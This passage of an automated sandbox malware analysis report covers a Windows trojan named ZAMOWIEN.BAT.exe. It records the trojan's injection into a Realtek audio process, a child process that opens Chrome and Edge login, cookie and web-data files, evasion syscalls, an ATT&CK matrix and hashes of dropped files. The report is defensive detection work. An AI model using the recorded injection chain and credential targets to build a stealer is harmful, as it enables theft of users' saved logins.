          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37777591 mov edi, dword ptr fs:[00000030h]2_2_37777591
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37709580 mov eax, dword ptr fs:[00000030h]2_2_37709580
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37709580 mov eax, dword ptr fs:[00000030h]2_2_37709580
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F582 mov eax, dword ptr fs:[00000030h]2_2_3778F582
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F478 mov eax, dword ptr fs:[00000030h]2_2_3778F478
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7460 mov eax, dword ptr fs:[00000030h]2_2_376C7460
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7460 mov eax, dword ptr fs:[00000030h]2_2_376C7460
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770D450 mov eax, dword ptr fs:[00000030h]2_2_3770D450
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770D450 mov eax, dword ptr fs:[00000030h]2_2_3770D450
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778D430 mov eax, dword ptr fs:[00000030h]2_2_3778D430
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778D430 mov eax, dword ptr fs:[00000030h]2_2_3778D430
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB420 mov eax, dword ptr fs:[00000030h]2_2_376CB420
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707425 mov eax, dword ptr fs:[00000030h]2_2_37707425
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707425 mov ecx, dword ptr fs:[00000030h]2_2_37707425
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776B420 mov eax, dword ptr fs:[00000030h]2_2_3776B420
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776B420 mov eax, dword ptr fs:[00000030h]2_2_3776B420
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37759429 mov eax, dword ptr fs:[00000030h]2_2_37759429
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F409 mov eax, dword ptr fs:[00000030h]2_2_3778F409
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F4FD mov eax, dword ptr fs:[00000030h]2_2_3778F4FD
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377054E0 mov eax, dword ptr fs:[00000030h]2_2_377054E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F94FA mov eax, dword ptr fs:[00000030h]2_2_376F94FA
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377854B0 mov eax, dword ptr fs:[00000030h]2_2_377854B0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377854B0 mov ecx, dword ptr fs:[00000030h]2_2_377854B0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3775D4A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775D4A0 mov eax, dword ptr fs:[00000030h]2_2_3775D4A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775D4A0 mov eax, dword ptr fs:[00000030h]2_2_3775D4A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770B490 mov eax, dword ptr fs:[00000030h]2_2_3770B490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770B490 mov eax, dword ptr fs:[00000030h]2_2_3770B490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F332D mov eax, dword ptr fs:[00000030h]2_2_376F332D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A3336 mov eax, dword ptr fs:[00000030h]2_2_377A3336
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C9303 mov eax, dword ptr fs:[00000030h]2_2_376C9303
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C9303 mov eax, dword ptr fs:[00000030h]2_2_376C9303
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F30A mov eax, dword ptr fs:[00000030h]2_2_3778F30A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377033D0 mov eax, dword ptr fs:[00000030h]2_2_377033D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D93A6 mov eax, dword ptr fs:[00000030h]2_2_376D93A6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D93A6 mov eax, dword ptr fs:[00000030h]2_2_376D93A6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37771390 mov eax, dword ptr fs:[00000030h]2_2_37771390
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37771390 mov eax, dword ptr fs:[00000030h]2_2_37771390
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQueryInformationToken: Direct from: 0x694DE3
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x694672
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6953BF
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQuerySystemInformation: Direct from: 0x69C58D
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x69FF180
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6A06DCE
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x69C6E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe NtClose: Indirect: 0x373DF61B
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x69320B
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x69C4F1
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FF8F2DE2651
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe NtQueueApcThread: Indirect: 0x373DF590
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6954AD
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FF8BDDD9E7F
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6954F1
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x69C63C
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x69FF1F7
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x69547E
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtCreateThreadEx: Direct from: 0x693A78
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe NtSuspendThread: Indirect: 0x373E3B69
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x69DB74
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe NtResumeThread: Indirect: 0x373E3E89
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x69C782
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x69FEFB1
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe NtSetContextThread: Indirect: 0x373E3849
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
          Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Thread register set: target process: 7484
          Source: C:\Windows\SysWOW64\sdchange.exe Thread register set: target process: 7484
          Source: C:\Windows\SysWOW64\sdchange.exe Thread register set: target process: 5620
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
          Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information

          Source: Yara match File source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match File source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 311 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          [Behavior graph] Behavior Graph ID: 1562240; Sample: ZAMOWIEN.BAT.exe; Startdate: 25/11/2024; Architecture: WINDOWS; Score: 96. Process chain: ZAMOWIEN.BAT.exe (started) -> ZAMOWIEN.BAT.exe (started) -> RAVCpl64.exe (injected) -> sdchange.exe (started) -> firefox.exe (started).

          Source | Detection | Scanner | Label | Link
          ZAMOWIEN.BAT.exe | 5% | ReversingLabs | |
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll | 3% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          Name | Malicious | Antivirus Detection | Reputation
          Name | Source | Malicious | Antivirus Detection | Reputation
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562240
Start date and time: 2024-11-25 11:52:44 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: ZAMOWIEN.BAT.exe
Detection: MAL
Classification: mal96.troj.spyw.evad.winEXE@7/10@19/13
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 80
• Number of non-executed functions: 294
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): login.live.com, ctldl.windowsupdate.com, clients.config.office.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ZAMOWIEN.BAT.exe
Time | Type | Description
05:57:48 | API Interceptor | 19561253x Sleep call for process: sdchange.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                Process:C:\Windows\SysWOW64\sdchange.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                Category:dropped
                                                                                Size (bytes):135168
                                                                                Entropy (8bit):1.1142956103012707
                                                                                Encrypted:false
                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):5632
                                                                                Entropy (8bit):3.81704362174321
                                                                                Encrypted:false
                                                                                SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                                                                MD5:3DD80DFF583544514EEB3A5ED851A519
                                                                                SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                                                                SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                                                                SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
• Filename: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Detection: malicious
• Filename: Readouts.bat.exe, Detection: malicious
• Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious
• Filename: Readouts.bat.exe, Detection: malicious
• Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious
• Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious
• Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious
• Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious
                                                                                Reputation:moderate, very likely benign file
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):11776
                                                                                Entropy (8bit):5.890541747176257
                                                                                Encrypted:false
                                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):278834
                                                                                Entropy (8bit):7.587268585042044
                                                                                Encrypted:false
